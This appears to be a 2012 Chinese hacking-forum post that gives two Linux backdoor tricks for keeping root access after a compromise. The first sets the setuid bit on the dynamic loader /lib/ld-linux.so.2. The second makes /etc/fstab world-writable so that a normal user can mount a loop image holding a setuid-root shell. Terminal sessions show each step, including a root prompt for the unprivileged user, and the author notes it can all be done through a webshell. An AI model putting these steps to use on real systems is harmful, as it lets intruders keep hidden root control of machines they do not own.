两个linux留后门的小技巧

[复制链接]
查看304 | 回复0 | 2012-4-1 19:21:16 | 显示全部楼层 |阅读模式
方法一:setuid的方法,其实8是很隐蔽。看看过程:

[root@localdomainlib]#ls-l|grepld-linux

lrwxrwxrwx1rootroot92008-06-0717:32ld-linux.so.2->ld-2.7.so

lrwxrwxrwx1rootroot132008-06-0717:47ld-lsb.so.3->ld-linux.so.2

[root@localdomainlib]#chmod+sld-linux.so.2

[root@localdomainlib]#ls-l|grepld-2.7.so

-rwsr-sr-x1rootroot1289522007-10-1804:49ld-2.7.so

lrwxrwxrwx1rootroot92008-06-0717:32ld-linux.so.2->ld-2.7.so

[root@localdomainlib]#

我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。

普通用户登录,测试下权限:

[xiaoyu@localdomain~]$whoami

xiaoyu

[xiaoyu@localdomain~]$/lib/ld-linux.so.2`whichwhoami`

root

[xiaoyu@localdomain~]$

恩,嘿嘿root了吧,具体怎么生成rootshell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2/bin/sh肯定生成不了rootshell,bash检查euid和uid,看是否相等...OK,不多说了。


方法二:

看过程:

[root@localdomainetc]#chmoda+w/etc/fstab

[root@localdomainetc]#

这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下

[xiaoyu@localdomain~]$ls-l/etc/fstab

-rw-rw-rw-1rootroot4562008-06-0717:28/etc/fstab

[xiaoyu@localdomain~]$echo'test/mntext2user,suid,exec,loop00'>>/etc/fstab

然后从本机把一个文件到目标机器上去,这里我们命名为test

[xiaoyu@localdomaintmp]$ls-ltest

-rw-rw-r--1xiaoyuxiaoyu1024002008-04-2002:51test

[xiaoyu@localdomaintmp]$mounttest

[xiaoyu@localdomaintmp]$cd/mnt

[xiaoyu@localdomainmnt]$ls-l

total18

drwx------2rootroot122882008-04-2005:44lost+found

-rwsr-sr-x1rootroot49272008-04-2005:44root

[xiaoyu@localdomainmnt]$./root

sh-3.2#

看到了吧,从普通用户提升到root了。呵呵。

test这个文件baidu貌似木有上传功能撒,木办法传

貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则